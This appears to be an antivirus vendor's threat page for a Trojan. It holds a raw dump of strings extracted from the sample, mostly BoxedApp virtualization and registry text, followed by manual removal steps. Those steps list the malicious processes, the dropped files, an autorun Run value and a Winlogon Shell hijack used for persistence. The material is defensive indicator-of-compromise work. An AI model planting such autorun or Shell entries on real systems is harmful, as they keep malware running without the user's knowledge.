\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PreviewHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates
\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates
publicKeyToken
Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\
!"#$%&'()* ,-./0123456789:;<=>?@
3, 3, 5, 0
BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Virtualization Technologies Ltd.
BoxedAppSDK.dll
\libcurl-4.dll
!"#$%&'()* ,-./0123456789:
pthreadgc2.dll
\pthreadgc2.dll
POSIX Threads for Windows LPGL
2, 9, 1, 0
pthreadGC2.DLL
http://sourceware.org/pthreads-win32/
\zlib1.dll
For more information visit http://www.zlib.net/

cvtres.exe_432_rwx_00B20000_000AE000:




.text
`.rdata
@.data
.rsrc
@.reloc
l$D9.tO
FTPSW
u$D
TryCreateProcessForVirtualEXE, template exe found:
CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x
CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x
CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x
CBoxedAppCore::My_NtQueryKey, KeyHandle =
CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =
CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x
KernelBase.dll
kernel32.dll
0x%x%x
CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '
CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x
C62E2B35-E4B3-4019-A7C4-F50AC7F78470
CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '
CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '
CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '
CBoxedAppCore::My_NtRenameKey, KeyHandle =
BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart
: Can't create process of rundll32.exe, last error =
BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
BoxedAppSDK_AttachMixedBitnessProcessHelper
BoxedAppSDK_EnumVirtualRegKeysA
BoxedAppSDK_EnumVirtualRegKeysW
BoxedAppSDK_ExecuteDotNetApplicationA
BoxedAppSDK_ExecuteDotNetApplicationW
BoxedAppSDK_DeleteVirtualRegKeyByHandle
BoxedAppSDK_DeleteVirtualRegKeyW
BoxedAppSDK_DeleteVirtualRegKeyA
BoxedAppSDK_CreateVirtualRegKeyW
BoxedAppSDK_CreateVirtualRegKeyA
{4F95F74C-9713-4181-ACDD-8A50195FBC0F}
BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper
BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper
CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '
CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x
CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x
:\VirtualDllWithSameImport.dll
:\VirtualDllWithTls.dll
VirtualDllWithTls.dll
VirtualDllWithSameImport.dll
ole32.dll
WinExec
advapi32.dll
NtRenameKey
NtUnloadKey
NtSetValueKey
NtSetInformationKey
NtSaveKey
NtRestoreKey
NtReplaceKey
NtQueryValueKey
NtQueryMultipleValueKey
NtQueryKey
NtOpenKeyEx
NtOpenKey
NtNotifyChangeKey
NtLoadKey2
NtLoadKey
NtFlushKey
NtEnumerateValueKey
NtEnumerateKey
NtDeleteValueKey
NtDeleteKey
NtCreateKey
ntdll.dll
[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]
FILE_EXECUTE
GENERIC_EXECUTE
KEY_WOW64_64KEY
KEY_WOW64_32KEY
KEY_NOTIFY
KEY_CREATE_LINK
KEY_ENUMERATE_SUB_KEYS
KEY_CREATE_SUB_KEY
KEY_SET_VALUE
KEY_QUERY_VALUE
SECTION_MAP_EXECUTE
PAGE_EXECUTE_WRITECOPY
PAGE_EXECUTE_READWRITE
PAGE_EXECUTE_READ
PAGE_EXECUTE
STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED
STATUS_LOCAL_USER_SESSION_KEY
STATUS_NULL_LM_PASSWORD
STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE
STATUS_CARDBUS_NOT_SUPPORTED
STATUS_INVALID_PORT_ATTRIBUTES
STATUS_PORT_MESSAGE_TOO_LONG
STATUS_PORT_DISCONNECTED
STATUS_PORT_CONNECTION_REFUSED
STATUS_INVALID_PORT_HANDLE
STATUS_PORT_ALREADY_SET
STATUS_EAS_NOT_SUPPORTED
STATUS_CTL_FILE_NOT_SUPPORTED
STATUS_WRONG_PASSWORD
STATUS_ILL_FORMED_PASSWORD
STATUS_PASSWORD_RESTRICTION
STATUS_PASSWORD_EXPIRED
STATUS_FLOAT_DENORMAL_OPERAND
STATUS_FLOAT_INVALID_OPERATION
STATUS_PIPE_NOT_AVAILABLE
STATUS_INVALID_PIPE_STATE
STATUS_PIPE_BUSY
STATUS_PIPE_DISCONNECTED
STATUS_PIPE_CLOSING
STATUS_PIPE_CONNECTED
STATUS_PIPE_LISTENING
STATUS_NOT_SUPPORTED
STATUS_PIPE_EMPTY
STATUS_WRONG_PASSWORD_CORE
STATUS_PIPE_BROKEN
STATUS_DISK_OPERATION_FAILED
STATUS_KEY_DELETED
STATUS_KEY_HAS_CHILDREN
STATUS_NO_USER_SESSION_KEY
STATUS_PASSWORD_MUST_CHANGE
STATUS_PORT_UNREACHABLE
STATUS_LOGIN_TIME_RESTRICTION
STATUS_LOGIN_WKSTA_RESTRICTION
STATUS_UNSUPPORTED_COMPRESSION
STATUS_NO_USER_KEYS
STATUS_NOT_EXPORT_FORMAT
STATUS_TRANSPORT_FULL
STATUS_WMI_NOT_SUPPORTED
STATUS_SAM_NEED_BOOTKEY_PASSWORD
STATUS_SAM_NEED_BOOTKEY_FLOPPY
STATUS_STRONG_CRYPTO_NOT_SUPPORTED
STATUS_NOT_SUPPORTED_ON_SBS
STATUS_CSS_KEY_NOT_PRESENT
STATUS_CSS_KEY_NOT_ESTABLISHED
STATUS_NO_KERB_KEY
STATUS_UNSUPPORTED_PREAUTH
STATUS_PORT_NOT_SET
STATUS_INVALID_IMPORT_OF_NON_DLL
STATUS_SMARTCARD_NO_KEY_CONTAINER
STATUS_SMARTCARD_NO_CERTIFICATE
STATUS_SMARTCARD_NO_KEYSET
STATUS_SMARTCARD_CERT_REVOKED
STATUS_SMARTCARD_CERT_EXPIRED
STATUS_SXS_KEY_NOT_FOUND
STATUS_CLUSTER_JOIN_IN_PROGRESS
STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS
RegDeleteKeyExW
NtRequestWaitReplyPort
NtConnectPort
NtReplyPort
NtCompleteConnectPort
NtAcceptConnectPort
NtReplyWaitReceivePort
NtCreateWaitablePort
Imported function,
.data
.idata
It's impossible to create virtual file: parent file is virtual, but passed pBehavior is not NULL
It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream
It's impossible to create virtual file: parent node is virtual, but passed pBehavior is not NULL
BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys
NtEnumerateKey() returned unexpected error, status =
, RegTree::IEnumKeyNode::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys
, RegTree::IKeyNode::EnumKeys() failed, hr =
: RegTree::IEnumKeyNode::GetNext() failed, hr =
: GetAllChildsKeys() failed, status =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal
: RegTree::IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath
error, IVirtualKeyHandle_GetFullPath() returned
Invalid key information class:
KeySetHandleTagsInformation is not supported for virtual handle
KeySetDebugInformation is not supported for virtual handle
KeySetVirtualizationInformation is not supported for virtual handle
KeyControlFlagsInformation is not supported for virtual handle
KeyWow64FlagsInformation is not supported for virtual handle
We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles
We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles
: IVirtualKeyHandle::Rename() failed, hr =
: RegTree::IKeyNode::Remove() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal
: RegTree::IKeyNode::AddKey() failed, hr =
: result hkey =
: IVirtualKey::CreateKey() failed, hr =
: we can't create a virtual key with its own behavior under another virtual key
: Handles::CreateVirtualKeyHandle() failed, hr =
: IVirtualKey::OpenKey() failed, hr =
: RegImpl::CreateKeyOnSharedMem() failed, hr =
: GetFullRegKeyPath() failed for the hKey =
: Handles::IVirtualKeyHandle::CreateKey() failed and returned
: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key
BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKey
: lpSubKey: "
BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey
: Handles::CreateVirtualKeyHandle() failed
BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal
: SearchStartingFromRealKey() failed
: RegTree::IKeyNode::FindValue() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal
: IVirtualKeyHandle::put_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime
: NtQueryKey() failed, status =
: NtOpenKey() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys
: NtEnumerateValueKey() failed when we tried to get name of the node, status =
: IKeyNode::EnumValues() failed, hr =
: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =
: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal
BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal
: invalid KeyInformationClass passed:
: IVirtualKeyHandle_GetFullPath() failed, hr =
: Behavior::IEnumVirtualKey::GetNext() failed, hr =
: IVirtualKeyHandle::EnumValues() failed, hr =
: IVirtualKeyHandle::EnumKeys() failed, hr =
: IVirtualKeyHandle::get_LastWriteTime() failed, hr =
reg:NtQueryMultipleValueKey(
: IKeyNode::FindValue() failed, hr =
: IVirtualKeyHandle::get_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal
: IVirtualKeyHandle::get_ValueType() failed, hr =
reg:NtSetInformationKey(
RegTree::IKeyNode::RemoveValue() failed, hr
BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal
reg:NtRenameKey(
RegTree::IEnumKeyNode::GetNext(), hr =
RegTree::IKeyNode::EnumKeys(), hr =
: IEnumVirtualKey::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal
reg:NtDeleteValueKey(
: NtEnumerateKey() failed when we tried to get name of the node, status =
, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =
, Behavior::IVirtualKey::OpenKey() failed, hr =
: IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal
reg:NtEnumerateValueKey(
reg:NtQueryKey(
reg:NtQueryValueKey(
reg:NtSetValueKey(
reg:NtCreateKey(
reg:NtDeleteKey(
reg:NtEnumerateKey(
reg:NtOpenKey(
GetProcessHeap
GetWindowsDirectoryW
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExW
RegDeleteKeyW
RegOpenKeyW
ADVAPI32.dll
OLEAUT32.dll
bxsdk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\bxsdk32.pdb
`.rsrc
v2.0.50727
BoxedAppSDK_AppDomainManager.dll
System.Security
.ctor
System.Security.Policy
System.Reflection
System.Runtime.InteropServices
System.Diagnostics
System.Runtime.CompilerServices
System.Collections
System.Security.Permissions
System.IO
DllImportAttribute
shell32.dll
lpCmdLine
1.0.0.0
$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78
D:\build_area\boxedapp_src\src\BoxedAppSolution\DotNetAppDomainManager\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb
mscoree.dll
BoxedAppSDKThunk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\BoxedAppSDKThunk32.pdb
.reloc
TLSSupport32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\TLSSupport32.pdb
9 9$9(9,909
4!40484}4
:$:,:5:::{:
?#?2?9?@?
1 1$1(1,1014181
9$=(=,=0=4=8=<=@=
6 6$6(6,6064686<6@6
1"26233'4
4 40454:4
:":2:7:>;
,1014181
8 8$8(8,8
%s_%.8x_%.8x_%.8x
\KernelBase.dll
\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
%d-%d-%p
:\TLSSupport310D39B571B74d36B95451DD240D8758
",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
\rundll32.exe"
DotNetAppDomainManager.CManagedHost
BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1
DotNetAppDomainManager.CAppDomainManager
.config
.manifest
",BoxedAppSDK_AttachMixedBitnessProcessHelper
Attempt to launch not executable file:
Unable to find appropriate template exe
comdlg32.dll
\dllhost.exe
hh.exe
find.exe
help.exe
winver.exe
regsvr32.exe
dllhost.exe
ntvdm.exe
tcpsvcs.exe
mpr.dll
Wadvapi32.dll
sxs.dll
Obtain a full version, purchase a license at http://boxedapp.com/boxedappsdk/order.html
%s_%.8x_%.8x
%s_%.8x
boxedapp_msg_process
boxedapp_event_newmsg
boxedapp_msg_global
bxsdk64.dll
:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\
\DosDevices\pipe\
\Device\NamedPipe\
\??\pipe\
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Gre_Initialize
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontMapper
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontDpi
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Locations
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PreviewHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates
\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates
publicKeyToken
Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\
!"#$%&'()* ,-./0123456789:;<=>?@
3, 3, 5, 0
BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Virtualization Technologies Ltd.
BoxedAppSDK.dll

cvtres.exe_432_rwx_10000000_00001000:




.text
`.rdata
@.reloc

cvtres.exe_432_rwx_62480000_00001000:




.text
0`.data
.rdata
[email protected]
.edata
[email protected]
.rsrc
.reloc

cvtres.exe_432_rwx_62E80000_00001000:




.text
P`.data
.rdata
`@.bss
.edata
[email protected]
.rsrc
.reloc


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    mscorsvw.exe:1912
    WScript.exe:1736
    %original file name%.exe:2024
    %original file name%.exe:544
    nt32.exe:1316

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\NTKernel\nt32.exe (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (133 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tar7F.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
    %Documents and Settings%\All Users\Application Data\load32.vbs (873 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\60E31627FDA0A46932B0E5948949F2A5 (933 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\E8974A4669383843486E5AFDB09650F5 (224 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
    %Documents and Settings%\%current user%\My Documents\315load32.exe (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C554DCF706A5AAB8B360FAD227EAB9C7 (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cab7E.tmp (49 bytes)
    %System%\wbem\Logs\wbemprox.log (76 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startup\Update.Microsoft.com.url (46 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\E8974A4669383843486E5AFDB09650F5 (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tar81.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C554DCF706A5AAB8B360FAD227EAB9C7 (176 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\0797C381B2F87EB5A1D5573BD15BA4F4 (240 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\60E31627FDA0A46932B0E5948949F2A5 (164 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\0797C381B2F87EB5A1D5573BD15BA4F4 (37 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cab80.tmp (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tar83.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (54 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
    C:\NTKernel\load32 (7972 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
    %Documents and Settings%\All Users\Application Data\load32.exe (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cab82.tmp (54 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "NT Kernel Service" = "C:\NTKernel\nt32.exe -rundll32 /SYSTEM32 C:\Windows\System32\taskmgr.exe %Program Files%\Microsoft\Windows"

  5. Remove the references to the Trojan by modifying the following registry value(s) (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell" = "explorer.exe,%Documents and Settings%\All Users\Application Data\load32.exe"

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now